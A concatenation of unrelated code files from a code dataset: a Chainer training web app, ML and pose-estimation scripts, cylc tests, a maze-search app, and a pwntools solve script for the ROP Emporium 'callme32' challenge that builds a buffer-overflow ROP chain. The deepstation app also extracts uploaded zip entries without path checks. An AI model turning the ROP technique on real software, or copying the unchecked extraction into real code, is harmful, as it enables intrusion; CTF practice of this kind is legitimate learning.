UPLOADED_IMAGES_DIR + os.sep + timestamp_str\n        os.mkdir(upload_image_dir_root)\n        db.execute('insert into Dataset(name, dataset_path, updated_at) values(?, ?, current_timestamp)', (dataset_name, upload_image_dir_root))\n        for f in zf.namelist():\n            temp_file_path = upload_image_dir_root + os.sep + f\n            if ('__MACOSX' in f) or ('.DS_Store' in f):\n                continue\n            if not os.path.basename(f):\n                if os.path.exists(temp_file_path):\n                    continue\n                os.mkdir(temp_file_path)\n            else:\n                if os.path.exists(temp_file_path):\n                    uzf = file(temp_file_path, 'w+b')\n                else:\n                    uzf = file(temp_file_path, 'wb')\n                uzf.write(zf.read(f))\n                uzf.close()\n    except:\n        return dumps({'error': traceback.format_exc(sys.exc_info()[2])})\n    finally:\n        if 'zf' in locals():\n            zf.close()\n        if 'uzf' in locals():\n            uzf.close()\n    return dumps({'status': 'success'})\n\n@app.route('/api/models/get_model_template/<model_name>')\ndef api_get_model_template(model_name):\n    model_template = open(DEEPSTATION_ROOT + os.sep + 'model_templates' + os.sep + model_name).read()\n    bottle.response.content_type = 'application/json'\n    ret = {'model_template': model_template}\n    return dumps(ret)\n    \n@app.route('/api/models/get_training_data/<id>')\ndef api_get_training_data(id, db):\n    model_row = db.execute('select line_graph_data_path, is_trained from Model where id = ?', (id,))\n    model = model_row.fetchone()\n    bottle.response.content_type = 'application/json'\n    if model[0] is None or not os.path.exists(model[0]):\n        return dumps({'status': 'graph not ready', 'is_trained': model[1]})\n    f = open(model[0], 'r')\n    data = f.read()\n    f.close()\n    return dumps({'status': 'ready', 'data': data, 'is_trained': model[1]})\n    \n@app.route('/api/models/chekc_train_progress')\ndef api_check_train_progress(db):\n    model_row = db.execute('select id, is_trained from Model')\n    models = model_row.fetchall()\n    progress = []\n    for m in models:\n        progress.append({'id': m[0], 'is_trained': m[1]})\n    bottle.response.content_type = 'application/json'\n    return dumps({'progress': progress})\n\n#------- private methods ---------\ndef find_all_files(directory):\n    for root, dirs, files in os.walk(directory):\n        for f in files:\n            if f.startswith('__MACOSX') or f.startswith('.DS_Store'):\n                continue\n            yield os.path.join(root, f)\n\ndef find_all_directories(directory):\n    for root, dirs, files in os.walk(directory):\n        if len(dirs) == 0:\n            yield root\n\ndef make_train_data(target_dir, prepared_data_dir):\n    train = open(prepared_data_dir + os.sep + 'train.txt', 'w')\n    test = open(prepared_data_dir + os.sep + 'test.txt', 'w')\n    labelsTxt = open(prepared_data_dir + os.sep + 'labels.txt', 'w')\n    classNo = 0\n    count = 0\n    for path, dirs, files in os.walk(target_dir):\n        if not dirs:\n            start = path.rfind(os.sep) + 1\n            labelsTxt.write(path[start:].split(os.sep)[0] + \"\\n\")\n            startCount = count\n            length = len(files)\n            for f in files:\n                if(f.split('.')[-1] not in [\"jpg\", \"jpeg\", \"gif\", \"png\"]):\n                    continue\n                imagepath = prepared_data_dir + os.sep + \"image%07d\" %count + \".jpg\"\n                resize_image(os.path.join(path, f), imagepath)\n                if count - startCount < length * 0.75:\n                    train.write(imagepath + \" %d\\n\" % classNo)\n                else:\n                    test.write(imagepath + \" %d\\n\" % classNo)\n                count += 1\n            classNo += 1\n    train.close()\n    test.close()\n    labelsTxt.close()\n    return\n\ndef resize_image(source, dest):\n    name, ext = os.path.splitext(source)\n    output_side_length = 256\n    img = cv2.imread(source)\n    height, width, depth = img.shape\n    new_height = output_side_length\n    new_width = output_side_length\n    if height > width:\n        new_height = 
output_side_length * height / width\n    else:\n        new_width = output_side_length * width / height\n    resized_img = cv2.resize(img, (new_width, new_height))\n    height_offset = (new_height - output_side_length) / 2\n    width_offset = (new_width - output_side_length) / 2\n    cropped_img = resized_img[height_offset:height_offset + output_side_length, width_offset:width_offset + output_side_length]\n    cv2.imwrite(dest, cropped_img)\n    return\n\ndef compute_mean(prepared_data_dir):\n    sum_image = None\n    count = 0\n    for line in open(prepared_data_dir + os.sep + 'train.txt'):\n        filepath = line.strip().split()[0]\n        image = numpy.asarray(Image.open(filepath)).transpose(2, 0, 1)\n        if sum_image is None:\n            sum_image = numpy.ndarray(image.shape, dtype=numpy.float32)\n            sum_image[:] = image\n        else:\n            sum_image += image\n        count += 1\n    mean = sum_image / count\n    pickle.dump(mean, open(prepared_data_dir + os.sep + 'mean.npy', 'wb'), -1)\n    return\n\ndef prepare_for_train(target_dir, prepared_data_dir):\n    make_train_data(target_dir, prepared_data_dir)\n    compute_mean(prepared_data_dir)\n\ndef start_train(model_id, epoch, prepared_data_dir, gpu):\n    if not is_prepared_to_train(prepared_data_dir):\n        raise Exception('preparation is not done')\n    train_th = threading.Thread(\n        target=train.do_train,\n        args = (\n            DEEPSTATION_ROOT + os.sep + 'deepstation.db',\n            prepared_data_dir + os.sep + 'train.txt',\n            prepared_data_dir + os.sep + 'test.txt',\n            prepared_data_dir + os.sep + 'mean.npy',\n            TRAINED_DATA_DIR,\n            'models',\n            model_id,\n            32,\n            250,\n            int(epoch, 10),\n            int(gpu, 10),\n            20\n        )\n    )\n    train_th.start()\n    return\n    \ndef is_prepared_to_train(prepared_data_dir):\n    if not os.path.isfile(prepared_data_dir + os.sep + 'mean.npy'):\n        return False\n    if not os.path.isfile(prepared_data_dir + os.sep + 'train.txt'):\n        return False\n    if not os.path.isfile(prepared_data_dir + os.sep + 'test.txt'):\n        return False\n    return True\n\ndef inspect(image_file_path, target_model, prepared_data_dir, network):\n    # resize\n    head, tail = os.path.split(image_file_path)\n    resized_image = TEMP_IMAGE_DIR + os.sep + get_timestamp() + '_' + tail\n    resize_image(image_file_path, resized_image)\n    # inspection\n    gpu_info = get_gpu_info()\n    gpu = -1 if 'error' in gpu_info else 0\n    ret = imagenet_inspect.inspect(resized_image, prepared_data_dir + os.sep + 'mean.npy', target_model, prepared_data_dir + os.sep + 'labels.txt', network, gpu)\n    return ret\n\ndef count_files(path):\n    ch = os.listdir(path)\n    counter = 0\n    for c in ch:\n        if os.path.isdir(path + os.sep + c):\n            counter += count_files(path + os.sep + c)\n        else:\n            counter += 1\n    return counter\n    \n# Pick num images at random from under path.\n# If path contains only directories, pick from the directories below it.\ndef get_files_in_random_order(path, num):\n    children_files = os.listdir(path)\n    children_files_num = len(children_files)\n    if children_files_num == 0:\n        return []\n    elif children_files_num == 1:\n        if os.path.isdir(path + os.sep + children_files[0]):\n            path = path + os.sep + children_files[0]\n            temp_file_num = len(os.listdir(path))\n            if temp_file_num < num:\n                num = temp_file_num\n        else:\n            num = 1\n    elif children_files_num < num:\n        num = children_files_num\n    files = []\n    candidates = random.sample(map(lambda n: path + os.sep + n, os.listdir(path)), num)\n    for f in candidates:\n        if os.path.isdir(f):\n            files.extend(get_files_in_random_order(f, 1))\n        else:\n            files.append(f.replace(UPLOADED_IMAGES_DIR, ''))\n    return files\n    \ndef get_timestamp():\n    return datetime.now().strftime('%Y-%m-%d_%H-%M-%S')\n    \ndef count_categories(path):\n    ch = os.listdir(path)\n    count = 
0\n if len(ch) is 1:\n if os.path.isdir(path + os.sep + ch[0]):\n count += count_categories(path + os.sep + ch[0])\n else:\n for c in ch:\n if os.path.isdir(path + os.sep + c):\n count += 1\n return count\n \ndef get_gpu_info():\n ret = {}\n current_platform = platform.system()\n try:\n if current_platform == 'Windows':\n xml = subprocess.check_output([NVIDIA_SMI_CMD, '-q', '-x'], shell=True)\n else:\n xml = subprocess.check_output([NVIDIA_SMI_CMD, '-q', '-x'])\n except:\n return {'error': 'command_not_available'}\n elem = fromstring(xml)\n ret['driver_version'] = elem.find('driver_version').text\n gpus = elem.findall('gpu')\n ret_gpus = []\n for g in gpus:\n info = {\n 'product_name': g.find('product_name').text,\n 'uuid': g.find('uuid').text,\n 'fan': g.find('fan_speed').text,\n 'minor_number': g.find('minor_number').text\n }\n temperature = g.find('temperature')\n info['temperature'] = temperature.find('gpu_temp').text\n power = g.find('power_readings')\n info['power_draw'] = power.find('power_draw').text\n info['power_limit'] = power.find('power_limit').text\n memory = g.find('fb_memory_usage')\n info['memory_total'] = memory.find('total').text\n info['memory_used'] = memory.find('used').text\n utilization = g.find('utilization')\n info['gpu_util'] = utilization.find('gpu_util').text\n ret_gpus.append(info)\n if current_platform == 'Linux':\n ret_gpus.sort(cmp=lambda x,y: cmp(int(x['minor_number']), int(y['minor_number'])))\n ret['gpus'] = ret_gpus\n return ret\n\ndef get_chainer_version():\n return chainer.__version__\n \ndef get_python_version():\n v = sys.version_info\n return str(v[0]) + '.' + str(v[1]) + '.' + str(v[2])\n \ndef show_error_screen(error):\n return bottle.template('errors.html', detail=error)\n \napp.run(host=settings['host'], port=settings['port'], debug=settings['debug'])\n\n","repo_name":"akiraak/deepstation","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":23825,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"} +{"seq_id":"27476433559","text":"def count_pairs(letters):\n hash = {}\n result = {\"pair\": 0, \"single\": 0}\n\n for letter in letters:\n if hash.get(letter):\n hash[letter] += 1\n else:\n hash[letter] = 1\n\n for k, v in hash.items():\n if v > 1:\n result[\"pair\"] += v - (v % 2)\n result[\"single\"] += v % 2\n else:\n result[\"single\"] += 1\n\n return result\n\n\ndef main(letters):\n counter = 0\n\n pairs = count_pairs(letters)\n counter += pairs[\"pair\"]\n\n if pairs[\"single\"] > 0:\n counter += 1\n\n return counter\n","repo_name":"imteekay/algorithms","sub_path":"coding_interviews/leetcode/easy/longest_palindrome.py","file_name":"longest_palindrome.py","file_ext":"py","file_size_in_byte":574,"program_lang":"python","lang":"en","doc_type":"code","stars":452,"dataset":"github-code","pt":"61"} +{"seq_id":"40749845819","text":"import pytest\nfrom queue import Queue\nfrom types import SimpleNamespace\n\nfrom cylc.flow.cycling.iso8601 import ISO8601Point\nfrom cylc.flow.simulation import sim_time_check\n\n\ndef get_msg_queue_item(queue, id_):\n for item in queue.queue:\n if id_ in str(item.job_id):\n return item\n\n\n@pytest.fixture(scope='module')\nasync def sim_time_check_setup(\n mod_flow, mod_scheduler, mod_start, mod_one_conf\n):\n schd = mod_scheduler(mod_flow({\n 'scheduler': {'cycle point format': '%Y'},\n 'scheduling': {\n 'initial cycle point': '1066',\n 'graph': {\n 'R1': 'one & fail_all & fast_forward'\n }\n },\n 'runtime': {\n 'one': {},\n 'fail_all': {\n 
'simulation': {'fail cycle points': 'all'},\n 'outputs': {'foo': 'bar'}\n },\n # This task ought not be finished quickly, but for the speed up\n 'fast_forward': {\n 'execution time limit': 'PT1M',\n 'simulation': {'speedup factor': 2}\n }\n }\n }))\n msg_q = Queue()\n async with mod_start(schd):\n itasks = schd.pool.get_tasks()\n for i in itasks:\n i.try_timers = {'execution-retry': SimpleNamespace(num=0)}\n yield schd, itasks, msg_q\n\n\ndef test_false_if_not_running(sim_time_check_setup, monkeypatch):\n schd, itasks, msg_q = sim_time_check_setup\n\n # False if task status not running:\n assert sim_time_check(msg_q, itasks) is False\n\n\ndef test_sim_time_check_sets_started_time(sim_time_check_setup):\n \"\"\"But sim_time_check still returns False\"\"\"\n schd, _, msg_q = sim_time_check_setup\n one_1066 = schd.pool.get_task(ISO8601Point('1066'), 'one')\n one_1066.state.status = 'running'\n assert one_1066.summary['started_time'] is None\n assert sim_time_check(msg_q, [one_1066]) is False\n assert one_1066.summary['started_time'] is not None\n\n\ndef test_task_finishes(sim_time_check_setup, monkeypatch):\n \"\"\"...and an appropriate message sent.\n\n Checks all possible outcomes in sim_time_check where elapsed time is\n greater than the simulation time.\n\n Does NOT check every possible cause on an outcome - this is done\n in unit tests.\n \"\"\"\n schd, _, msg_q = sim_time_check_setup\n monkeypatch.setattr('cylc.flow.simulation.time', lambda: 0)\n\n # Setup a task to fail\n fail_all_1066 = schd.pool.get_task(ISO8601Point('1066'), 'fail_all')\n fail_all_1066.state.status = 'running'\n fail_all_1066.try_timers = {'execution-retry': SimpleNamespace(num=0)}\n\n # Before simulation time is up:\n assert sim_time_check(msg_q, [fail_all_1066]) is False\n\n # After simulation time is up:\n monkeypatch.setattr('cylc.flow.simulation.time', lambda: 12)\n assert sim_time_check(msg_q, [fail_all_1066]) is True\n assert get_msg_queue_item(msg_q, '1066/fail_all').message == 'failed'\n\n # Succeeds and records messages for all outputs:\n fail_all_1066.try_timers = {'execution-retry': SimpleNamespace(num=1)}\n msg_q = Queue()\n assert sim_time_check(msg_q, [fail_all_1066]) is True\n assert sorted(i.message for i in msg_q.queue) == ['bar', 'succeeded']\n\n\ndef test_task_sped_up(sim_time_check_setup, monkeypatch):\n \"\"\"Task will speed up by a factor set in config.\"\"\"\n schd, _, msg_q = sim_time_check_setup\n fast_forward_1066 = schd.pool.get_task(\n ISO8601Point('1066'), 'fast_forward')\n fast_forward_1066.state.status = 'running'\n\n monkeypatch.setattr('cylc.flow.simulation.time', lambda: 0)\n assert sim_time_check(msg_q, [fast_forward_1066]) is False\n monkeypatch.setattr('cylc.flow.simulation.time', lambda: 29)\n assert sim_time_check(msg_q, [fast_forward_1066]) is False\n monkeypatch.setattr('cylc.flow.simulation.time', lambda: 31)\n assert sim_time_check(msg_q, [fast_forward_1066]) is True\n","repo_name":"hjoliver/cylc-flow","sub_path":"tests/integration/test_simulation.py","file_name":"test_simulation.py","file_ext":"py","file_size_in_byte":3876,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"61"} +{"seq_id":"73182862595","text":"import cv2\nimport numpy as np\nimport torch\nimport torchvision\nfrom pathlib import Path\nfrom PIL import Image\nfrom object_detection_util import getImageInterestArea\nfrom pose_estimation_util import getPersonPosition\n\n# Object detection model\n# Define the path to the YOLOv5 directory\nyolov5_dir = Path(\"./yolov5\")\n\n# Load 
the YOLOv5 model for object detection\nmodel = torch.hub.load(str(yolov5_dir), \"custom\", path=str(yolov5_dir / \"yolov5s.pt\"), source=\"local\")\nmodel.conf = 0.4\n\n# Set the device (CPU or GPU)\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\nmodel.to(device).eval()\n\n# Pose estimation model\n# create a model object from the keypointrcnn_resnet50_fpn class\nmodel_pose_estimation = torchvision.models.detection.keypointrcnn_resnet50_fpn(pretrained=True)\nmodel_pose_estimation.eval()\n\n# Load the video\nvideo = cv2.VideoCapture(\"./images/video_test4.mp4\")\nif (video.isOpened() == False): \n print(\"Unable to read camera feed\")\n\n# Create output video\nfps = 30\nframe_width = int(video.get(3))\nframe_height = int(video.get(4))\nout = cv2.VideoWriter('outpy.avi',cv2.VideoWriter_fourcc('M','J','P','G'), fps, (frame_width,frame_height))\n\n# Configuration for text\nfont = cv2.FONT_HERSHEY_SIMPLEX\norg = (50, 50)\nfontScale = 1\ncolor = (255, 255, 255)\nthickness = 2\n\nframe_count = 0\nwhile True:\n ret, frame = video.read()\n if not ret:\n break\n \n frame_pil = Image.fromarray(frame[:, :, ::-1])\n\n # Perform object detection using YOLOv5\n results = model(frame_pil, size=640)\n\n # Process area in the image with a person\n interestArea = getImageInterestArea(frame, results)\n\n # Find the person position on image\n position = getPersonPosition(frame, model_pose_estimation)\n\n # Add info text on the result frame\n outImg = position[0]\n outImg = cv2.putText(outImg, (\"Posicao: \" + str(position[1])), org, font, fontScale, color, thickness, cv2.LINE_AA)\n if(interestArea != None):\n outImg = cv2.putText(outImg, (\"Objetos: \" + ' '.join(interestArea[1])), (50, 100), font, 0.7, color, thickness, cv2.LINE_AA)\n cv2.imshow(\"output\", outImg)\n out.write(outImg)\n\n # Save the results\n cv2.imwrite(\"yolo_output.png\", np.squeeze(results.render()))\n cv2.imwrite(\"input.png\", frame)\n cv2.imwrite(\"keypoints.png\", position[0])\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\nvideo.release()\ncv2.destroyAllWindows()","repo_name":"GustavoHen12/VisaoComputacional","sub_path":"FINAL/ta5.py","file_name":"ta5.py","file_ext":"py","file_size_in_byte":2398,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72529260354","text":"from skmultilearn.problem_transform import ClassifierChain\nimport numpy as np\nimport sklearn\n\n\nclass ClassifierChainEnsemble(object):\n \"\"\"An ensemble of ClassifierChains. ClassifierChain has been implemented in skmultilearn.\n ClassifierChainEnsemble is a meta estimator that creates an ensemble of classifier chains\n on multilabel classification problems and averages the predictions of classifiers in the ensemble to\n improve predictive accuracy.\n The order of the labels in each ClassifierChain are chosen randomly.\n I have not implemented multiclass ensemble yet. Currently, ClassifierChainEnsemble class supports binary class,\n multilabel ensembling\n Parameters\n ----------\n base_estimator : object, optional (default=None)\n The base estimator from which the ensemble is built.\n n_estimators : integer\n The number of estimators in the ensemble.\n estimator_params : list of strings\n The list of attributes to use as parameters when instantiating a\n new base estimator. 
If none are given, default parameters are used.\n Attributes\n ----------\n _ensemble : list of estimators\n The collection of fitted classifier chains.\n perms_list : list of permutations\n list of permutations of labels used to train classifier chains\n \"\"\"\n\n def __init__(self, base_estimator, n_estimators=10,\n estimator_params=tuple()):\n\n # Set parameters\n\n self.base_estimator = base_estimator\n self.n_estimators = n_estimators\n self.estimator_params = estimator_params\n # define perms_list to keep track of permutations shown to ClassifierChain\n self.perms_list = [[] for _ in range(n_estimators)]\n self._ensemble = [ClassifierChain(base_estimator) for _ in range(n_estimators)]\n\n\n def _bag(self, table):\n \"\"\"\n :type table: numpy array\n _bag is an internal method, not to be called explicitly.\n \"\"\"\n avg_pred = table.sum(0) / float(self.n_estimators)\n return avg_pred\n\n\n def fit(self, X, Y):\n \"\"\"\n :param X: training set as numpy array of shape [n_samples, n_features]\n :param Y: training labels as numpy array of shape [n_samples, n_labels]\n :return: None\n The method trains n_estimator classifier chains, each on a random permutation of labels\n \"\"\"\n\n # will have to implement selecting random subsets of X later\n for i in range(0, self.n_estimators):\n self.perms_list[i] = np.random.permutation(Y.shape[1])\n # print(self.perms_list[i])\n # print(Y[:, self.perms_list[i]])\n self._ensemble[i].fit(X, Y[:, self.perms_list[i]])\n\n def predict(self, X, rule=\"majority_vote\"):\n \"\"\"\n :param X: testing set as numpy array of shape [n_samples, n_features]\n :param rule: the polling rule used to decide between the predicted classes. Only \"majority_vote\" for binary classes\n has been implemented at this point.\n :return: predicted labels for each row of X as numpy array of shape [n_test_samples, n_labels]\n ClassifierChain predicts labels in the order of labels shown to it. We undo these permutations used to train\n classifier chains (using np.argsort in the following) when predicting the labels in the test set\n \"\"\"\n\n prediction_mat = []\n for i in range(self.n_estimators):\n reverse_perm = np.argsort(self.perms_list[i])\n prediction_mat.append(self._ensemble[i].predict(X).todense()[:, reverse_perm])\n prediction_mat = np.asarray(prediction_mat)\n result = self._bag(prediction_mat)\n if rule == \"majority_vote\":\n threshold = 0.5\n result[result >= threshold] = 1\n result[result < threshold] = 0\n return result\n\n\n def predict_proba(self, X):\n \"\"\"\n :param X: testing set as numpy array of shape [n_samples, n_features]\n :return: predicted probability of being in one class for each row of X as numpy array of shape\n [n_test_samples, n_labels]\n ClassifierChain predicts labels in the order of labels shown to it. We undo these permutations used to train\n classifier chains (using np.argsort in the following) when predicting the labels in the test set\n \"\"\"\n\n predict_proba_mat = []\n for i in range(self.n_estimators):\n reverse_perm = np.argsort(self.perms_list[i])\n predict_proba_mat.append(self._ensemble[i].predict_proba(X).todense()[:, reverse_perm])\n predict_proba_mat = np.asarray(predict_proba_mat)\n result = self._bag(predict_proba_mat)\n return result\n\n\nif __name__ == \"__main__\":\n ensemble = ClassifierChainEnsemble(sklearn.linear_model.LogisticRegression(penalty=\"l1\", C=1))\n\n \"\"\"\n An example of how to use the ClassifierChainEnsemble class. 
Note that the synthetic dataset generated below can give errors\n that have to do with data generation rather than class implementation. In case of errors, run the script again.\n \"\"\"\n # this will generate a dataset\n from sklearn.datasets import make_multilabel_classification\n x, y = make_multilabel_classification(sparse=True, n_labels=5,n_classes=3,\n n_samples=5,\n #return_indicator='dense',\n allow_unlabeled=False)\n #fit the dataset\n ensemble.fit(x, y)\n pred_mat = ensemble.predict(x) #predicting (on the training data)\n pred_proba_mat = ensemble.predict_proba(x)\n\n #print the accuracy of the ensemble for each label\n for i in range(0,y.shape[1]):\n\t print(sum(pred_mat[:,i]==y[:,i])/float(y.shape[0]))","repo_name":"alexgzhou/DataScience","sub_path":"LabelCorrection-KingsWoo/source/classifier_chain.py","file_name":"classifier_chain.py","file_ext":"py","file_size_in_byte":5822,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"73138198913","text":"import numpy as np\nfrom exp_backprops import do_train_config\nimport os\nimport pandas as pd\nimport json\nimport pickle\n\nredo = False\n\n# divide mask amount\nbest_lambda = 1.0/(14*14*64)*np.power(0.2,2)\n\n\nif redo:\n n_masks_to_use = [5,10,20,40,80,150,220,250,300]\n print(sorted(n_masks_to_use))\n\n\n all_masks_path = './config_files/mask_files/all_filtered_masks.pkl'\n with open(all_masks_path,'rb') as f:\n all_mask_dict = pickle.load(f)\n mask_keys_sorted = list(sorted(all_mask_dict['masks']))\n\n\n\n all_inds_list = ''\n\n result_paths = {'exp_path' : [],'n_masks' : []}\n for ind,nmasks in enumerate(n_masks_to_use):\n print('-----------------------------------------------')\n print('-----------------------------------------------')\n print('Doing EXP: {0} with nmasks: {1}'.format(ind,nmasks))\n print('-----------------------------------------------')\n print('-----------------------------------------------')\n\n # create file with lx number of masks\n # limit indexs list too\n temp_mask_dict = all_mask_dict.copy()\n selected_indexs = mask_keys_sorted[0: nmasks]\n temp_mask_dict['masks'] = {}\n temp_mask_dict['masks'] = {k: all_mask_dict['masks'][k] for k in selected_indexs}\n with open('temp_mask_file.pkl', 'wb') as f:\n pickle.dump(temp_mask_dict, f)\n with open('temp_inds_list.txt', 'w') as f:\n f.write('\\n'.join(selected_indexs))\n\n\n config_file = './config_files/train_files/gen_imagenet_subset_09_oct_074.json'\n exp_params_dict = {}\n exp_params_dict['indexs_string'] = 'n02114548_10505.JPEG,n02120079_9808.JPEG,n02114548_11513.JPEG,n02120079_4409.JPEG,n02114548_5207.JPEG'\n exp_params_dict['n_iterations'] = 100\n exp_params_dict['iter_till_insert'] = 1\n exp_params_dict['gens_per_original'] = 1\n exp_params_dict['skip_insert'] = False\n exp_params_dict['batch_size_exp'] = 50\n exp_params_dict['exp_list'] = [13]\n exp_params_dict['base_name'] = 'loss_v1_allmasks_iterative_{0}'.format(ind)\n exp_params_dict['dropout_k'] = 20\n exp_params_dict['mask_file_path_map'] = 'temp_mask_file.pkl'\n exp_params_dict['plot_masks'] = True\n exp_params_dict['missclass_index_path'] = 'temp_inds_list.txt'\n exp_params_dict['add_summary'] = True\n exp_params_dict['lambda_value'] = best_lambda\n\n res_path = do_train_config(config_file, **exp_params_dict)\n result_paths['exp_path'].append(res_path)\n result_paths['n_masks'].append(nmasks)\n\n os.remove('temp_mask_file.pkl')\n os.remove('temp_inds_list.txt')\n\n with open(\"resultados_mask_incremental_V1_exp.json\",'w') as f:\n 
json.dump(result_paths,f)\n\n\nimport matplotlib.pyplot as plt\n\nwith open(\"resultados_mask_incremental_V1_exp.json\",'r') as f:\n result_paths=json.load(f)\n\n# plot lambdas vs accuracy\nn_masks = []\naccs = []\nval_acc_col = 1\nfor i in range(len(result_paths['exp_path'])):\n path_resx = result_paths['exp_path'][i]\n lambda_x = result_paths['n_masks'][i]\n\n path_accs = os.path.join(path_resx, 'accuracy_simple.csv')\n data=pd.read_csv(path_accs,header=None)\n acc_last_it = data.iloc[-1][val_acc_col]\n\n n_masks.append(lambda_x)\n accs.append(acc_last_it)\n\nwith plt.style.context(('ggplot')):\n fig, ax = plt.subplots()\n ax.plot(n_masks,accs,'*--')\n ax.set_xlabel('Cantidad mascaras')\n ax.set_ylabel('Accuracy validacion')\n ax.grid()\n plt.savefig('seleccion_mascaras.png', dpi=100)","repo_name":"aferral/mejora_clasificador_feedback_CAM","sub_path":"exp_scripts/v1_choose_mask_num.py","file_name":"v1_choose_mask_num.py","file_ext":"py","file_size_in_byte":3554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"41813840408","text":"from pwn import *\n\nBINARY = \"./callme32\"\nELF = ELF(BINARY)\n\ncontext.os = \"linux\"\ncontext.arch = \"i386\"\ncontext.binary = BINARY\n\np = process(BINARY)\n\nrop = b\"A\" * 44\n\nfor func in ['callme_one', 'callme_two', 'callme_three']:\n rop += p32(ELF.symbols[func])\n rop += p32(0x80487f9) # pop esi ; pop edi ; pop ebp ; ret\n rop += p32(0xdeadbeef)\n rop += p32(0xcafebabe)\n rop += p32(0xd00df00d)\n\np.sendline(rop)\nlog.success(f\"ROPchain = {rop}\")\n\nflag = p.recvall().split(b'\\n')[-2]\nlog.success(f\"FLAG : {flag}\")\n","repo_name":"0xSoEasY/ROPemporium","sub_path":"x86/2-callme/solve.py","file_name":"solve.py","file_ext":"py","file_size_in_byte":518,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"61"} +{"seq_id":"74986536193","text":"from datetime import datetime, timedelta\nimport random\n\nclass Student:\n def __init__(self, group, year, first_name, last_name):\n self.group = group\n self.year = year\n self.first_name = first_name\n self.last_name = last_name\n self.marks = []\n\n def add_mark(self, mark):\n self.marks.append(mark)\n\nclass Mark:\n def __init__(self, date, estimation):\n self.date = date\n self.estimation = estimation\n\n# Генерация случайной оценки или пропуска (по уважительной причине или нет)\ndef get_random_estimation():\n n = random.randint(0, 4)\n if n == 0:\n return \"2\"\n elif n == 1:\n return \"3\"\n elif n == 2:\n return \"4\"\n elif n == 3:\n return \"5\"\n else:\n return \"болезнь\"\n\n# Генерация оценок и посещаемости на 10 дней вперед для каждого студента\ndef generate_marks(students):\n current_date = datetime.today()\n for student in students:\n for i in range(10):\n date = current_date + timedelta(days=i)\n estimation = get_random_estimation()\n mark = Mark(date, estimation)\n student.add_mark(mark)\n\n# Добавление студента в группу\ndef add_student_to_group(group, year, first_name, last_name, students):\n student = Student(group, year, first_name, last_name)\n students.append(student)\n\n# Создание списка студентов\nstudents = []\nadd_student_to_group(\"Группа 1\", 2021, \"Иван\", \"Иванов\", students)\nadd_student_to_group(\"Группа 1\", 2021, \"Петр\", \"Петров\", students)\nadd_student_to_group(\"Группа 2\", 2020, \"Александр\", \"Сидоров\", students)\n\n# Генерация оценок и посещаемости на 10 дней вперед для каждого студента\ngenerate_marks(students)\n\n# Вывод оценок и посещаемости для каждого 
# Print grades and attendance for each student\nfor student in students:\n    print(f\"{student.group} {student.year}, {student.first_name} {student.last_name}\")\n    for mark in student.marks:\n        print(f\"{mark.date.date()} - {mark.estimation}\")\n    print()\n","repo_name":"Dedok35/ExamAlgorithmization_PalaginD.V.","sub_path":"Python.py","file_name":"Python.py","file_ext":"py","file_size_in_byte":2279,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"4341736914","text":"# main.py\n# ---------------\n# Licensing Information:  You are free to use or extend this project for\n# educational purposes provided that (1) you do not distribute or publish\n# solutions, (2) you retain this notice, and (3) you provide clear\n# attribution to the University of Illinois at Urbana-Champaign\n#\n# Created by Kelvin Ma (kelvinm2@illinois.edu) on 01/24/2021, \n# Inspired by previous work by Michael Abir (abir2@illinois.edu) and Rahul Kunji (rahulsk2@illinois.edu)\n\n\"\"\"\nThis file contains the main application that is run for this MP. It\ninitializes the pygame context, and handles the interface between the\ngame and the search algorithm.\n\"\"\"\n\nimport sys, argparse, time\n\nfrom pygame.constants import K_d, K_u\nfrom const import WALL_CHAR\n\nimport pygame\n\nfrom maze import Maze\nimport search\n\nclass gradient:\n    def __init__(self, start, end):\n        # rgb colors\n        self.start = start \n        self.end = end \n    \n    def __getitem__(self, fraction):\n        t = fraction[0] / max(1, fraction[1] - 1) # prevent division by zero\n        return tuple(max(0, min(start * (1 - t) + end * t, 255)) \n            for start, end in zip(self.start, self.end))\n\nclass agent:\n    def __init__(self, position, maze):\n        self.position = position \n        self.maze = maze \n\n    def move(self, move):\n        position = tuple(i + move for i, move in zip(self.position, move))\n        if self.maze.isValidMove(*position, True):\n            previous = self.position\n            self.position = position \n            return previous,\n        else: \n            return ()\n    \nclass Application:\n    def __init__(self, human = True, scale = 20, fps = 30, alt_color = False):\n        self.running = True\n        self.scale = scale\n        self.fps = fps\n        \n        self.human = human \n        # accessibility for colorblind students \n        if alt_color:\n            self.gradient = gradient((64, 224, 208), (139, 0, 139))\n        else:\n            self.gradient = gradient((255, 0, 0), (0, 255, 0))\n\n    def run(self, filepath, mode, save):\n        self.maze = Maze(None, None, filepath=filepath)\n        h, w, l = self.maze.getDimensions()\n        self.width = w\n        \n        self.window = ((l * w + (l - 1) * 2) * self.scale, h * self.scale)\n\n        if self.human:\n            self.agent = agent(self.maze.getStart(), self.maze)\n            states_explored = 0\n            path = []\n        else:\n            #time in seconds\n            time_start = time.time()\n            path = getattr(search, mode)(self.maze, True)\n            states_explored = self.maze.states_explored\n            time_total = time.time() - time_start \n            if not path:\n                print(\"No solution found!\")\n                return\n\n        pygame.init()\n        \n        self.surface = pygame.display.set_mode(self.window, pygame.HWSURFACE)\n        self.surface.fill((255, 255, 255))\n        pygame.display.flip()\n        pygame.display.set_caption('MP2 ({0})'.format(filepath))\n\n        if self.human:\n            self.draw_player()\n        else:\n            print(\"\"\"\nResults \n{{\n    path length : {0}\n    states explored : {1}\n    total execution time: {2:.2f} seconds\n}}\n            \"\"\".format(len(path), states_explored, time_total))\n            \n            self.draw_path(path)\n\n        self.draw_maze()\n        self.draw_start()\n        self.draw_objectives()\n\n        pygame.display.flip()\n        \n        if type(save) is str:\n            pygame.image.save(self.surface, save)\n            self.running 
